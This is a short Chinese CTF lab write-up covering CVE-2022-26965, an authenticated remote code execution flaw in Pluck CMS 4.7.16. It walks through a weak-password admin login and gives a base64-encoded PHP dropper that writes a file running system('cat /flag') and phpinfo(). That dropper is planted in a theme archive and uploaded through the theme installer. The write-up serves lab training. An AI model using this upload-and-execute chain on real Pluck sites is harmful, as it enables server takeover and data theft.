[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
靶标介绍
Pluck-CMS-Pluck-4.7.16 后台RCE
靶场截图
靶场过关
1、点击url进入首页,点击admin进入后台登录页面


2、弱口令admin登录,进入 后台管理页面

3、去github上搜索Pluck CMS,下载压缩包解压


将构造的一句话木马写入info.php中
file_put_contents() 函数:把一个字符串写入文件中。
base64_decode()对encoded_data进行解码,返回原始数据。
PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTtwaHBpbmZvKCk7Pz4是<?php system('cat /flag');phpinfo();?>的base64编码
<?php file_put_contents('haha.php',base64_decode('PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTtwaHBpbmZvKCk7Pz4='));?>

4、将改好的文件压缩为zip,去安装主题处上传




5、访问haha.php获取flag



浙公网安备 33010602011771号